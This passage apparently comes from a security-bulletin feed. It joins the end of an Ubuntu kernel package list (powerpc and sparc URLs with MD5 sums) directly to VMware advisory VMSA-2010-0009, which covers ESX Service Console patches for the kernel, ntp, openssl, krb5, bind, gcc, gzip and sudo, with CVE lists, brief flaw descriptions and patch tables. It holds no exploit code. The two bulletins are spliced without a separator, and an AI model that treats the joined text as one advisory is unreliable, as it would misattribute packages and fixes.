http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    28984 419926b33e2b573f8d3ccaa5ade657f1\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   314922 83dcb63807ffb50682219b20333c23bc\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   357524 a32753bfca44b1afb9b11f72b25ebb9e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  2027754 9b45ff8446ec0bad5befec2dc3ecdb72\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  2247744 35d212f7569bb03564a7f0294879557f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   213544 3fb9afb7247290ffb3508744ab6cbb9f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   209776 e42b20eb402cb2a55fea2a80f5cef162\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   210242 78939115c860efacb83481c0687f1a7a\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   244856 8fcff5fb05c0921681ec2bb44637c624\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   111834 a6b65e618a3240d51f36f37911d1d7cc\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   131610 dc5625deacbac446e71517f5902376b1\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    49028 ac60e4bf193e7725de6d8999c6231915\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    44082 531b2cbe15ec2f62fe61bd7002b1df02\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     5852 f049a9332d469b247e451868b4f22cce\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     6504 32fb4de3cd714598281c2d4d5d2ee6d6\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    79118 e98cffbfe6f6cbffcfa6dce199dc6c46\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    85190 e648dc2d3e124d68c47d4ec18836097f\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    74318 19b737ad1f43e7be1c6cc7e211085424\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    27228 0b5b4529d140289e616bded832055cbc\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     8538 9010c080bd63660bf529930565d49f62\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     9818 e909c37d26354ddbdceddc72628d71b3\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    58830 ae6573a0664b5486360156dd6711776c\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    70140 83085dfd5f4bb24ab67dd967e6b609cc\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    23714 86a598e1b13e4d6963475732e7a1097a\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    30804 b382bc0bfffd61156d0f8b3dc90bd307\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  1556894 ea2800c85a0115ad2e524a8b4ab4cb91\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  1509110 e42499f8bdbad020301a11617f6b65a8\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    81698 095ff78875bae0b90edd07ac3b51993d\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    88530 1a36ce88a0c6f7b495c869da15bf9d69\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    64400 8ff9a2aef998409440c1139f3db8c7ee\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    76990 392faa17f8c688e3856d91fb657eba09\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   141540 636e6d1827591a3aa46b82d7dc0b8ab6\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   151356 0f39f4d13770ceab049be6fb9c83fc16\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   139430 14f825a3334b18614059312527002767\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    70106 6dde178febff58a546142209374e1616\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    46510 64b0be995ce3d697a84cd3b0665ffe68\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    93974 28048300aba15f2a3937723bc0afc5cd\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   588788 c17e7feb3442296b7ed93c92cb988625\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   148426 6f429deb9df760daf28c04ad93ea6758\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    75862 6f382de52d9e1b52611c70a703895e5d\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  2892370 ec9440bb8ee05a7ac071992c5711139f\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb\n      Size/MD5:   601506 1b56c59b3df953a640760b876d752465\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb\n      Size/MD5:   600680 166e5056f971d5fa031230c1af67d028\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb\n      Size/MD5: 20496992 6ebab55c96d6be71ffb8c3a493d31a74\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb\n      Size/MD5: 20193918 98b3c6e44f8e302cca36530b434e9525\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb\n      Size/MD5:   740254 b1a453339b4d68717a445f07b87b53a4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   266068 1b8caecb838a9dd9b9c765f6603197a3\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   209168 e0e78f6a435e0ca46d5680e08d6e8db0\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    26268 f730be03c2b96e53e779a5d3df4cde93\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   314080 b673ee07d0c907d6ba00a561b915868d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  1675490 8642bd711b6643bd26ddc80674cef9e4\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   222882 136f6b9e24a16823f7309438fd0bd60a\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   121954 75090ea655204cc898db4634fc8aa021\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    38798 a11bcf765626194255c1d5a7d0106c2a\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   100798 af5903bc65fd381528f733fb1ba4100f\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:     8932 ebcb23a73a538276e41fcff9b7bb1d15\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    62926 7eba529ee44c2e107b693605dcbf1247\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   120960 8f63ad112de0797974650631dee53d13\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  1217912 87a2a4f21ee86e0f36bc5298a226513b\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   101576 057a15ca3fa891e47216adcf5ae071f7\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   200148 f90834ae24c0f516ef83fa5aa66bafbb\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   184674 d704744a26941df63b9195288306fa7b\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2010-0009\nSynopsis:          ESXi ntp and ESX Service Console third party updates\nIssue date:        2010-05-27\nUpdated on:        2010-05-27 (initial release of advisory)\nCVE numbers:       CVE-2009-2695 CVE-2009-2908 CVE-2009-3228\n                   CVE-2009-3286 CVE-2009-3547 CVE-2009-3613\n                   CVE-2009-3612 CVE-2009-3620 CVE-2009-3621\n                   CVE-2009-3726 CVE-2007-4567 CVE-2009-4536\n                   CVE-2009-4537 CVE-2009-4538 CVE-2006-6304\n                   CVE-2009-2910 CVE-2009-3080 CVE-2009-3556\n                   CVE-2009-3889 CVE-2009-3939 CVE-2009-4020\n                   CVE-2009-4021 CVE-2009-4138 CVE-2009-4141\n                   CVE-2009-4272 CVE-2009-3563 CVE-2009-4355\n                   CVE-2009-2409 CVE-2009-0590 CVE-2009-1377\n                   CVE-2009-1378 CVE-2009-1379 CVE-2009-1386\n                   CVE-2009-1387 CVE-2009-4212 CVE-2009-1384\n                   CVE-2010-0097 CVE-2010-0290 CVE-2009-3736\n                   CVE-2010-0001 CVE-2010-0426 CVE-2010-0427\n                   CVE-2010-0382\n- ------------------------------------------------------------------------\n\n1. Summary\n\n   ESXi update for ntp and ESX Console OS (COS) updates for COS\n   kernel, openssl, krb5, gcc, bind, gzip, sudo. \n\n2. Relevant releases\n\n   VMware ESX 4.0.0 without patches ESX400-201005401-SG,\n   ESX400-201005406-SG, ESX400-201005408-SG, ESX400-201005407-SG,\n   ESX400-201005405-SG, ESX400-201005409-SG\n\n3. Problem Description\n\n a. Service Console update for COS kernel\n\n    Updated COS package \"kernel\" addresses the security issues that are\n    fixed through versions 2.6.18-164.11.1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228,\n    CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues\n    fixed in kernel 2.6.18-164.6.1\n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621,\n    CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537,\n    CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1\n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080,\n    CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,\n    CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to\n    the security issues fixed in kernel 2.6.18-164.11.1. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005401-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n b. ESXi userworld update for ntp\n\n    The Network Time Protocol (NTP) is used to synchronize the time of\n    a computer client or server to another server or reference time\n    source. \n\n    A vulnerability in ntpd could allow a remote attacker to cause a\n    denial of service (CPU and bandwidth consumption) by using\n    MODE_PRIVATE to send a spoofed (1) request or (2) response packet\n    that triggers a continuous exchange of MODE_PRIVATE error responses\n    between two NTP daemons. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-3563 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           4.0       ESXi     ESXi400-201005401-SG\n    ESXi           3.5       ESXi     affected, patch pending\n\n    ESX            any       ESX      not applicable\n\n    vMA            any       RHEL5    not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n c. Service Console package openssl updated to 0.9.8e-12.el5_4.1\n\n    OpenSSL is a toolkit implementing SSL v2/v3 and TLS protocols with\n    full-strength cryptography world-wide. \n\n    A memory leak in the zlib could allow a remote attacker to cause a\n    denial of service (memory consumption) via vectors that trigger\n    incorrect calls to the CRYPTO_cleanup_all_ex_data function. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-4355 to this issue. \n\n    A vulnerability was discovered which may allow remote attackers to\n    spoof certificates by using MD2 design flaws to generate a hash\n    collision in less than brute-force time. NOTE: the scope of this\n    issue is currently limited because the amount of computation\n    required is still large. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-2409 to this issue. \n\n    This update also includes security fixes that were first addressed\n    in version openssl-0.9.8e-12.el5.i386.rpm. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the names CVE-2009-0590, CVE-2009-1377, CVE-2009-1378,\n    CVE-2009-1379, CVE-2009-1386 and CVE-2009-1387 to these issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005401-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending**\n\n  *  hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n  ** see VMSA-2010-0004\n\n d. Service Console update for krb5 to 1.6.1-36.el5_4.1 and pam_krb5 to\n    2.2.14-15. \n\n    Kerberos is a network authentication protocol. It is designed to\n    provide strong authentication for client/server applications by\n    using secret-key cryptography. \n\n    Multiple integer underflows in the AES and RC4 functionality in the\n    crypto library could allow remote attackers to cause a denial of\n    service (daemon crash) or possibly execute arbitrary code by\n    providing ciphertext with a length that is too short to be valid. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-4212 to this issue. \n\n    The service console package for pam_krb5 is updated to version\n    pam_krb5-2.2.14-15. This update fixes a flaw found in pam_krb5. In\n    some non-default configurations (specifically, where pam_krb5 would\n    be the first module to prompt for a password), a remote attacker\n    could use this flaw to recognize valid usernames, which would aid a\n    dictionary-based password guess attack. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-1384 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005406-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n e. Service Console package bind updated to 9.3.6-4.P1.el5_4.2\n\n    BIND (Berkeley Internet Name Daemon) is by far the most widely used\n    Domain Name System (DNS) software on the Internet. \n\n    A vulnerability was discovered which could allow remote attacker to\n    add the Authenticated Data (AD) flag to a forged NXDOMAIN response\n    for an existing domain. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0097 to this issue. \n\n    A vulnerability was discovered which could allow remote attackers\n    to conduct DNS cache poisoning attacks by receiving a recursive\n    client query and sending a response that contains CNAME or DNAME\n    records, which do not have the intended validation before caching. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0290 to this issue. \n\n    A vulnerability was found in the way that bind handles out-of-\n    bailiwick data accompanying a secure response without re-fetching\n    from the original source, which could allow remote attackers to\n    have an unspecified impact via a crafted response. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0382 to this issue. \n\n    NOTE: ESX does not use the BIND name service daemon by default. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005408-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n f. Service Console package gcc updated to 3.2.3-60\n\n    The GNU Compiler Collection includes front ends for C, C++,\n    Objective-C, Fortran, Java, and Ada, as well as libraries for these\n    languages\n\n    GNU Libtool\u0027s ltdl.c attempts to open .la library files in the\n    current working directory.  This could allow a local user to gain\n    privileges via a Trojan horse file.  The GNU C Compiler collection\n    (gcc) provided in ESX contains a statically linked version of the\n    vulnerable code, and is being replaced. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-3736 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            4.0       ESX      ESX400-201005407-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n g. Service Console package gzip update to 1.3.3-15.rhel3\n\n    gzip is a software application used for file compression\n\n    An integer underflow in gzip\u0027s unlzw function on 64-bit platforms\n    may allow a remote attacker to trigger an array index error\n    leading to a denial of service (application crash) or possibly\n    execute arbitrary code via a crafted LZW compressed file. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0001 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005405-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n h. Service Console package sudo updated to 1.6.9p17-6.el5_4\n\n    Sudo (su \"do\") allows a system administrator to delegate authority\n    to give certain users (or groups of users) the ability to run some\n    (or all) commands as root or another user while providing an audit\n    trail of the commands and their arguments. \n\n    When a pseudo-command is enabled, sudo permits a match between the\n    name of the pseudo-command and the name of an executable file in an\n    arbitrary directory, which allows local users to gain privileges\n    via a crafted executable file. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0426 to this issue. \n\n    When the runas_default option is used, sudo does not properly set\n    group memberships, which allows local users to gain privileges via\n    a sudo command. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0427 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005409-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the md5sum of your downloaded file. \n\n   ESX 4.0\n   -------\n   http://bit.ly/aqTCqn\n   md5sum: ace37cd8d7c6388edcea2798ba8be939\n   sha1sum: 8fe7312fe74a435e824d879d4f1ff33df25cee78\n   http://kb.vmware.com/kb/1013127\n\n   Note ESX400-201005001 contains the following security bulletins\n   ESX400-201005404-SG (ntp), ESX400-201005405-SG (gzip),\n   ESX400-201005408-SG (bind), ESX400-201005401-SG (kernel, openssl),\n   ESX400-201005406-SG (krb5, pam_krb5), ESX400-201005402-SG (JRE),\n   ESX400-201005403-SG (expat), ESX400-201005409-SG (sudo),\n   ESX400-201005407-SG (gcc). \n\n5. References\n\n   CVE numbers\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2695\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2908\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3228\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3286\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3613\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3612\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3621\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3726\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4567\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4536\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4537\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4538\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6304\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2910\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3080\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3556\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3889\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3939\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4020\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4021\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4138\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4141\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4355\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0590\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4212\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0097\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0290\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3736\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0001\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0426\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0427\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0382\n\n- ------------------------------------------------------------------------\n\n6. Change log\n\n2010-05-27  VMSA-2010-0009\nInitial security advisory after release of patch 06 bulletins for ESX\n4.0 on 2010-05-27\n\n- -----------------------------------------------------------------------\n7. 